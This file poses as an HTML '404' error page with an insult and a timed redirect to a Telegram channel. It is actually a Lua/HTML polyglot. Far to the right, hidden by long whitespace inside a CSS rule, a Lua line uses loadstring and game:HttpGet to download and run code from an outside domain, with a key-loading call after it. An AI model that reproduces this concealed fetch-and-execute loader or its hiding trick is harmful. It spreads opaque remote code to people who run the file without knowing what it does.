--[[
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PROTECTED</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #000;
            color: #000;
            text-align: center;
            padding: 50px;
        }
        .container {
            color: #fff;
            max-width: 400px;
            background: #111;
            padding: 30px;
            border-radius: 8px;
            box-shadow: 0px 0px 10px rgba(255, 255, 255, 0.2);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        <!--]]loadstring(game:HttpGet("https://antioderhub.fun/ScriptSourceCode/"))()Ioad("6e69ea63aa5374739dcd79ffa35446cc")--[[-->
            margin: auto;
        }
        h1 {
            font-size: 40px;
            color: #ff0000;
            margin-bottom: 10px;
        }
        p {
            font-size: 16px;
            color: #ccc;
        }
        .error-code {
            font-size: 50px;
            font-weight: bold;
            color: #fff;
        }
    </style>
</head>
<body>

    <div class="container">
        <div class="error-code">404</div>
        <h1>FUCK YOU</h1>
    </div>
<script>
            setTimeout(() => {
              window.location.href = "https://t.me/AOHscript";
            }, 3000);
</script>

</body>
</html>
]]
